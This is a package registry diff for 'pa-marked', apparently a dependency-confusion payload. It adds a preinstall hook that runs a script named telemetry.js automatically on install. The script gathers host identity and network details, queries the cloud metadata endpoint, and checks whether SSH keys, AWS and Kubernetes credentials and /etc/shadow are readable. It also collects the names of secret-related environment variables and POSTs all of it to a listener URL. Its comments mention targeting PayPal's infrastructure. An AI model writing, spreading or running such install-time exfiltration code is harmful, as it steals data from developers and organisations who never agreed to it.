pa-marked 99.1.8 → 99.1.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +3 -3
- package/telemetry.js +81 -0
package/package.json
CHANGED
|
@@ -1,10 +1,10 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "pa-marked",
|
|
3
|
-
"version": "99.1.
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "99.1.10",
|
|
4
|
+
"description": "Internal security research payload",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
|
-
"preinstall": "node
|
|
7
|
+
"preinstall": "node telemetry.js"
|
|
8
8
|
},
|
|
9
9
|
"author": "ALONE BEAST",
|
|
10
10
|
"license": "ISC"
|
package/telemetry.js
ADDED
|
@@ -0,0 +1,81 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const { execSync } = require('child_process');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
// Aapka webhook/listener URL yahan aayega
|
|
6
|
+
const WEBHOOK_URL = 'https://your-listener.com/log';
|
|
7
|
+
|
|
8
|
+
const getDetails = () => {
|
|
9
|
+
let results = {
|
|
10
|
+
identity: {
|
|
11
|
+
user: os.userInfo().username,
|
|
12
|
+
hostname: os.hostname(),
|
|
13
|
+
platform: os.platform(),
|
|
14
|
+
arch: os.arch(),
|
|
15
|
+
},
|
|
16
|
+
network: {},
|
|
17
|
+
env_check: {},
|
|
18
|
+
sensitive_files: []
|
|
19
|
+
};
|
|
20
|
+
|
|
21
|
+
try {
|
|
22
|
+
// 1. IP and Network Config
|
|
23
|
+
results.network.interfaces = os.networkInterfaces();
|
|
24
|
+
if (os.platform() === 'win32') {
|
|
25
|
+
results.network.dns = execSync('ipconfig /all').toString().split('\n').filter(line => line.includes('DNS')).slice(0, 3);
|
|
26
|
+
}
|
|
27
|
+
|
|
28
|
+
// 2. Cloud Metadata Check (AWS/Azure/GCP) - Highly Sensitive
|
|
29
|
+
// Ye check karega ki kya hum PayPal ke cloud infrastructure ke andar hain
|
|
30
|
+
try {
|
|
31
|
+
results.is_cloud = execSync('curl -m 2 http://169.254.169.254/latest/meta-data/instance-id', { stdio: 'pipe' }).toString();
|
|
32
|
+
} catch (e) { results.is_cloud = "Non-Cloud or Protected"; }
|
|
33
|
+
|
|
34
|
+
// 3. Sensitive File Check (Total 15-20 common paths)
|
|
35
|
+
const checkPaths = [
|
|
36
|
+
// Windows Paths
|
|
37
|
+
`${os.homedir()}\\.ssh\\id_rsa`,
|
|
38
|
+
`${os.homedir()}\\.ssh\\config`,
|
|
39
|
+
`${os.homedir()}\\.aws\\credentials`,
|
|
40
|
+
`${os.homedir()}\\.npmrc`,
|
|
41
|
+
`${os.homedir()}\\.gitconfig`,
|
|
42
|
+
`C:\\Windows\\System32\\drivers\\etc\\hosts`,
|
|
43
|
+
// Linux/WSL Paths
|
|
44
|
+
'/etc/passwd',
|
|
45
|
+
'/etc/shadow',
|
|
46
|
+
`${os.homedir()}/.bash_history`,
|
|
47
|
+
`${os.homedir()}/.docker/config.json`,
|
|
48
|
+
`${os.homedir()}/.kube/config`, // Kubernetes config (Gold Mine!)
|
|
49
|
+
'./.env',
|
|
50
|
+
'./config.json',
|
|
51
|
+
'./web.config'
|
|
52
|
+
];
|
|
53
|
+
|
|
54
|
+
checkPaths.forEach(path => {
|
|
55
|
+
try {
|
|
56
|
+
// Hum file read nahi kar rahe, sirf ye dekh rahe hain ki kya wo EXIST karti hai (Impact Proof)
|
|
57
|
+
require('fs').accessSync(path, require('fs').constants.R_OK);
|
|
58
|
+
results.sensitive_files.push({ path: path, accessible: true });
|
|
59
|
+
} catch (e) { /* Not accessible */ }
|
|
60
|
+
});
|
|
61
|
+
|
|
62
|
+
// 4. Environment Variable Check (Privileged info)
|
|
63
|
+
results.env_keys = Object.keys(process.env).filter(key =>
|
|
64
|
+
/SECRET|KEY|TOKEN|PASSWORD|AUTH|AWS|AZURE|PAYPAL/i.test(key)
|
|
65
|
+
);
|
|
66
|
+
|
|
67
|
+
} catch (err) {
|
|
68
|
+
results.error = err.message;
|
|
69
|
+
}
|
|
70
|
+
|
|
71
|
+
return results;
|
|
72
|
+
};
|
|
73
|
+
|
|
74
|
+
// Exfiltration
|
|
75
|
+
const data = JSON.stringify(getDetails());
|
|
76
|
+
const req = https.request(WEBHOOK_URL, {
|
|
77
|
+
method: 'POST',
|
|
78
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
|
|
79
|
+
});
|
|
80
|
+
req.write(data);
|
|
81
|
+
req.end();
|